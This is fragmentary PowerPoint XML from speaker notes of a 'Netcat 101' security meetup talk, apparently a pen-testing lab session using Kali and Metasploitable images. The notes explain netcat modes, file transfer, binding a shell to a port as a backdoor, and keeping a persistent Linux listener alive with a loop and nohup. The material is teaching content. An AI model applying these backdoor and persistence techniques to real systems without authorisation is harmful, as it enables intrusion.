              <a:t> Netcat runs in Client mode – you tell it what IP and PORT to connect to and away it goes. Netcat will take anything entered in STDIN and send it across the network. This can be the Keyboard, a programs piped output, or a redirection from a file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>All data that comes back across the network goes to STDOUT. Normally this is the screen, but you can also redirect to a file or pipe into another program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Messages from the tool itself end up on STDERR, which is nice as it does not mess up any capture from STDOUT – this is different to telnet.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84996" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F66F8ED7-C919-418F-946F-0A74EC8CF093}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>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685800" y="228600"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> alternative mode is Listener Mode, which is activated by a switch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This is identical to the previous slide with one difference – clients initiate connections, listeners wait for them. STDIN etc is all connected up the same way</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84996" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F66F8ED7-C919-418F-946F-0A74EC8CF093}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Netcat has lots of options – but the most commons ones are listed here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-e is an important one to understand. After a successful connection netcat will start up this program. It will connect STDIN of the program to the STDOUT of Netcat, and STDOUT of the program to STDIN of Netcat.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-I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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So lets start with the simplest setup of all – a chat server. You can follow on along yourselves using the Kali and Metasploitable images, or just wait a few slides and we will have an exercise to try all this out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Running the first command on one machine sets up Netcat listening on a set port. On another machine (or the same one if you like) you can establish a client connection to this listening port – now anything you type on one machine is displayed on the other and vice versa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>A bit more advanced way is nc –nvlp PORT. Verbose mode adds STDERR information like successful connection details, -n tells netcat not to bother using DNS to a do a reverse lookup on the incoming IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So think what is happening here for a minute. Anthing you enter on STDIN on the first machine is send over the network to Netcat listener, which in turn displays it on the STDOUT of that machine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-I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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>With netcat you can do more than just transfering data of course, you can easily use it to transfer files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Here you are simply redirecting a file into the STDIN of netcat, or taking it from STDOUT. This is very powerful and we’ll show some more advanced uses of this a bit later on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>One practical example in a Pen Test would be using Netcat to upload wget to the compromised machine, and then use wget to download a more fully featuered backdoor. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that Netcat does not give any indication that the file has fully transferred, so just wait a while depending on the size of the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We have one more example, and then we will go to our first Exercise – where you can try all 3 of these netcat tricks out yourselves. This last example is very important for pen-testing – Binding a Shell to a port, in essence – creating a Backdoor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>To do this we use the –e option. Netcat can take an executable file and redirect the input, output and error messages to a TCP or UDP port rather than the default console. To explain this further, think about the cmd.exe executable. By redirecting STDIN, STDOUT to the network on a port, anyone connecting to that port will be presented with a command-line prompt from that machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The Linux and Windows versions are a little bit different here. Obviously they both use different shells to send back, but also I used a capital –L for the Windows version. This is a persistant listener – in other words if the connection between the attacker and the backdoor ends (e.g. CTRL-C), the listener stays open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>To do this in Linux is pretty simple. Create a short shell script that put netcat in an infinite while loop (the spaces here around the 1 in the while loop are important). Then chmod it to be executable and readable. Lastly push it to the background, and using nohup means it will continue running even if the current user logs out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors6.xml"/><Relationship Id="rId12"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data6.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout6.xml"/><Relationship Id="rId10"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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors8.xml"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing8.xml"/><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data8.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout8.xml"/><Relationship Id="rId10"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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors10.xml"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing10.xml"/><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data10.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout10.xml"/><Relationship Id="rId10"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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors12.xml"/><Relationship Id="rId12" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing12.xml"/><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diagramData" Target="../diagrams/data11.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout11.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors11.xml"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing11.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data12.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout12.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyl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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors2.xml"/><Relationship Id="rId12"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diagramData" Target="../diagrams/data2.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout2.xml"/><Relationship Id="rId10"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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors4.xml"/><Relationship Id="rId12"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data4.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout4.xml"/><Relationship Id="rId10"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381000" y="228600"/>
            <a:ext cx="8305800" cy="50292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E" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Cork | Sec #17</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>18:30-19:00 Socialising </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>19:10-20:15 Netcat 101 - Bob</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="3600" spc="-100" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:effectLst>
                  <a:innerShdw blurRad="50800" dist="25400" dir="13500000">
                    <a:prstClr val="black">
                      <a:alpha val="70000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>20:15-20:25 Break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E" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3200">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:shade val="75000"/>
                      <a:alpha val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
